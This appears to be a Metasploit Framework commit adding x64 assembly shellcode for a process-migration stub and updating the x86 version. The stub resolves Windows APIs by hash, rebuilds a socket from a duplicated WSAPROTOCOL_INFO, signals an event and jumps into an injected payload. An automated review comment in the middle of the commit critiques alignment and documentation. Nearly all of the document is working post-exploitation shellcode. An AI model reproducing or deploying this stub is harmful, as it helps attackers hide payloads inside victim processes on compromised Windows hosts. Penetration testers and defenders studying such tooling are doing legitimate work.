Commit the new x64 migrate stub. Compatible with x64->x64 migration (and x86->x64 migration once the remote thread issue is resolved)

git-svn-id: file:///home/svn/framework3/trunk@8163 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Stephen Fewer 2010-01-19 18:39:56 +00:00
parent d85c801b11
commit f3fd2eae80
2 changed files with 73 additions and 1 deletions


@ -0,0 +1,71 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 306 bytes
; Build: >build.py migrate
;-----------------------------------------------------------------------------;
; typedef struct MigrateContext
; {
; union
; {
; HANDLE hEvent;
; BYTE bPadding1[8];
; } e;
; union
; {
; LPVOID lpPayload;
; BYTE bPadding2[8];
; } p;
; WSAPROTOCOL_INFO info;
; } MIGRATECONTEXT, * LPMIGRATECONTEXT;
[BITS 64]
[ORG 0]
cld ; Clear the direction flag.
mov rsi, rcx ; RCX is a pointer to our migration stub context
sub rsp, 0x2000 ; Alloc some space on stack
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ;
%include "./src/block/block_api.asm"
start: ;
pop rbp ; Pop off the address of 'api_call' for calling later.
; setup the structures we need on the stack...
mov r14, 'ws2_32' ;
push r14 ; Push the bytes 'ws2_32',0,0 onto the stack.
mov rcx, rsp ; save pointer to the "ws2_32" string for LoadLibraryA call.
sub rsp, 408+8 ; alloc sizeof( struct WSAData ) bytes for the WSAData structure (+8 for alignment)
mov r13, rsp ; save pointer to the WSAData structure for WSAStartup call.
sub rsp, 0x28 ; alloc space for function calls
; perform the call to LoadLibraryA...
mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call rbp ; LoadLibraryA( "ws2_32" )
; perform the call to WSAStartup...
mov rdx, r13 ; second param is a pointer to this stuct
push byte 2 ;
pop rcx ; set the param for the version requested
mov r10d, 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call rbp ; WSAStartup( 2, &WSAData );
; perform the call to WSASocketA...
xor r8, r8 ; we do not specify a protocol
push r8 ; push zero for the flags param.
push r8 ; push null for reserved parameter
lea r9, [rsi+16] ; We specify the WSAPROTOCOL_INFO structure from the MigrateContext
push byte 1 ;
pop rdx ; SOCK_STREAM == 1
push byte 2 ;
pop rcx ; AF_INET == 2
mov r10d, 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
mov rdi, rax ; save the socket for later
; perform the call to SetEvent...
mov rcx, qword [rsi] ; Set the first parameter to the migrate event
mov r10d, 0x35269F1D ; hash( "kernel32.dll", "SetEvent" )
call rbp ; SetEvent( hEvent );
; perform the call to the payload...
call qword [rsi+8] ; Call the payload...
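Review bot: The alignment line `and rsp, 0xFFFFFFFFFFFFFFF0` buries a 16-byte mask in a 64-bit literal that the assembler must fold into a sign-extended imm32; `and rsp, -16 ; 16-byte align RSP` states the intent directly, and the same applies to `sub rsp, 408+8`, where a named constant such as `WSADATA_SIZE equ 408` would tie the allocation to the comment beside it. The comment on `sub rsp, 0x28` ("alloc space for function calls") is doubtful: if the api_call included from block_api.asm reserves the 0x20-byte shadow space itself before jumping to the resolved API (the include is not visible here, so confirm), then this adjustment's real job is keeping RSP 16-byte aligned at each `call rbp`, and the comment should say so rather than suggest it supplies shadow space. The header block documents size and targets but not the register contract, so a line like `; In: rcx = LPMIGRATECONTEXT; Out: does not return, enters lpPayload with rdi = socket, rsi = context` would make the hand-off on the final `call qword [rsi+8]` explicit, as would a note that stack consumed by each api_call and the two pushed WSASocketA arguments is never reclaimed and is covered by the 0x2000 reserved up front.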


@ -1,6 +1,7 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Architecture: x86
; Version: 1.0 (Jan 2010)
; Size: 219 bytes
; Build: >build.py migrate
@ -56,7 +57,7 @@ start: ;
inc eax ;
push eax ; Push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
xchg edi, eax ; Save the socket for later, we don't care about the value of eax after this
push dword [esi] ; Push the event